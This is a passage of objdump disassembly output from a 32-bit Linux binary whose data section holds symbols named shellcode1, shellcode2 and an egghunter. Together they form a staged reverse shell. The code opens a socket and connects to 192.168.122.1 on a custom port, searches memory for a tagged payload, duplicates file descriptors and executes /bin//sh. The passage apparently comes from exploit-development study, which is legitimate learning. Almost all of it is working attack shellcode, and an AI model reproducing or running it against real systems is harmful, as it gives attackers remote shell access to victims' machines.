 804a00c:	f6 82 04 08 06 83 04 	testb  $0x4,-0x7cf9f7fc(%edx)
 804a013:	08 16                	or     %dl,(%esi)
 804a015:	83                   	.byte 0x83
 804a016:	04 08                	add    $0x8,%al

Дизассемблирование раздела .data:

0804a020 <__data_start>:
 804a020:	00 00                	add    %al,(%eax)
	...

0804a024 <__dso_handle>:
	...

0804a040 <shellcode1>:
 804a040:	93                   	xchg   %eax,%ebx
 804a041:	51                   	push   %ecx
 804a042:	93                   	xchg   %eax,%ebx
 804a043:	59                   	pop    %ecx
 804a044:	01 51 93             	add    %edx,-0x6d(%ecx)
 804a047:	59                   	pop    %ecx
 804a048:	31 db                	xor    %ebx,%ebx
 804a04a:	f7 e3                	mul    %ebx
 804a04c:	b0 66                	mov    $0x66,%al
 804a04e:	43                   	inc    %ebx
 804a04f:	52                   	push   %edx
 804a050:	53                   	push   %ebx
 804a051:	6a 02                	push   $0x2
 804a053:	89 e1                	mov    %esp,%ecx
 804a055:	cd 80                	int    $0x80
 804a057:	96                   	xchg   %eax,%esi
 804a058:	b0 66                	mov    $0x66,%al
 804a05a:	b3 03                	mov    $0x3,%bl
 804a05c:	68 c0 a8 7a 01       	push   $0x17aa8c0
 804a061:	66 68 ab cd          	pushw  $0xcdab
 804a065:	66 6a 02             	pushw  $0x2
 804a068:	89 e1                	mov    %esp,%ecx
 804a06a:	6a 10                	push   $0x10
 804a06c:	51                   	push   %ecx
 804a06d:	56                   	push   %esi
 804a06e:	89 e1                	mov    %esp,%ecx
 804a070:	cd 80                	int    $0x80
 804a072:	83 c4 20             	add    $0x20,%esp
 804a075:	5f                   	pop    %edi
 804a076:	83 ec 24             	sub    $0x24,%esp
 804a079:	ff e7                	jmp    *%edi
 804a07b:	00 00                	add    %al,(%eax)
 804a07d:	00 00                	add    %al,(%eax)
	...

0804a080 <shellcode2>:
 804a080:	93                   	xchg   %eax,%ebx
 804a081:	51                   	push   %ecx
 804a082:	93                   	xchg   %eax,%ebx
 804a083:	59                   	pop    %ecx
 804a084:	02 51 93             	add    -0x6d(%ecx),%dl
 804a087:	59                   	pop    %ecx
 804a088:	5b                   	pop    %ebx
 804a089:	6a 02                	push   $0x2
 804a08b:	59                   	pop    %ecx
 804a08c:	b0 3f                	mov    $0x3f,%al
 804a08e:	cd 80                	int    $0x80
 804a090:	49                   	dec    %ecx
 804a091:	79 f9                	jns    804a08c <shellcode2+0xc>
 804a093:	31 c0                	xor    %eax,%eax
 804a095:	b0 0b                	mov    $0xb,%al
 804a097:	52                   	push   %edx
 804a098:	68 2f 2f 73 68       	push   $0x68732f2f
 804a09d:	68 2f 62 69 6e       	push   $0x6e69622f
 804a0a2:	89 e3                	mov    %esp,%ebx
 804a0a4:	52                   	push   %edx
 804a0a5:	89 e2                	mov    %esp,%edx
 804a0a7:	53                   	push   %ebx
 804a0a8:	89 e1                	mov    %esp,%ecx
 804a0aa:	cd 80                	int    $0x80
	...

0804a0c0 <egghunter>:
 804a0c0:	6a 02                	push   $0x2
 804a0c2:	59                   	pop    %ecx
 804a0c3:	57                   	push   %edi
 804a0c4:	51                   	push   %ecx
 804a0c5:	31 c9                	xor    %ecx,%ecx
 804a0c7:	66 81 c9 ff 0f       	or     $0xfff,%cx
 804a0cc:	41                   	inc    %ecx
 804a0cd:	6a 43                	push   $0x43
 804a0cf:	58                   	pop    %eax
 804a0d0:	cd 80                	int    $0x80
 804a0d2:	3c f2                	cmp    $0xf2,%al
 804a0d4:	74 f1                	je     804a0c7 <egghunter+0x7>
 804a0d6:	b8 93 51 93 59       	mov    $0x59935193,%eax
 804a0db:	89 cf                	mov    %ecx,%edi
 804a0dd:	af                   	scas   %es:(%edi),%eax
 804a0de:	75 ec                	jne    804a0cc <egghunter+0xc>
 804a0e0:	89 cb                	mov    %ecx,%ebx
 804a0e2:	59                   	pop    %ecx
 804a0e3:	20 c8                	and    %cl,%al
 804a0e5:	af                   	scas   %es:(%edi),%eax
 804a0e6:	51                   	push   %ecx
 804a0e7:	89 d9                	mov    %ebx,%ecx
 804a0e9:	75 e1                	jne    804a0cc <egghunter+0xc>
 804a0eb:	59                   	pop    %ecx
 804a0ec:	e2 d5                	loop   804a0c3 <egghunter+0x3>
 804a0ee:	ff e7                	jmp    *%edi
	...

Дизассемблирование раздела .bss:

0804a0f1 <__bss_start>:
 804a0f1:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .comment:

00000000 <.comment>:
   0:	47                   	inc    %edi
   1:	43                   	inc    %ebx
   2:	43                   	inc    %ebx
   3:	3a 20                	cmp    (%eax),%ah
   5:	28 55 62             	sub    %dl,0x62(%ebp)
   8:	75 6e                	jne    78 <_init-0x804823c>
   a:	74 75                	je     81 <_init-0x8048233>
   c:	20 34 2e             	and    %dh,(%esi,%ebp,1)
   f:	38 2e                	cmp    %ch,(%esi)
  11:	34 2d                	xor    $0x2d,%al
  13:	32 75 62             	xor    0x62(%ebp),%dh
  16:	75 6e                	jne    86 <_init-0x804822e>
  18:	74 75                	je     8f <_init-0x8048225>
  1a:	31 7e 31             	xor    %edi,0x31(%esi)
  1d:	34 2e                	xor    $0x2e,%al
  1f:	30 34 29             	xor    %dh,(%ecx,%ebp,1)
  22:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  25:	38 2e                	cmp    %ch,(%esi)
  27:	34 00                	xor    $0x0,%al
  29:	47                   	inc    %edi
  2a:	43                   	inc    %ebx
  2b:	43                   	inc    %ebx
  2c:	3a 20                	cmp    (%eax),%ah
  2e:	28 55 62             	sub    %dl,0x62(%ebp)
  31:	75 6e                	jne    a1 <_init-0x8048213>
  33:	74 75                	je     aa <_init-0x804820a>
  35:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  38:	38 2e                	cmp    %ch,(%esi)
  3a:	32 2d 31 39 75 62    	xor    0x62753931,%ch
  40:	75 6e                	jne    b0 <_init-0x8048204>
  42:	74 75                	je     b9 <_init-0x80481fb>
  44:	31 29                	xor    %ebp,(%ecx)
  46:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  49:	38 2e                	cmp    %ch,(%esi)
  4b:	32 00                	xor    (%eax),%al
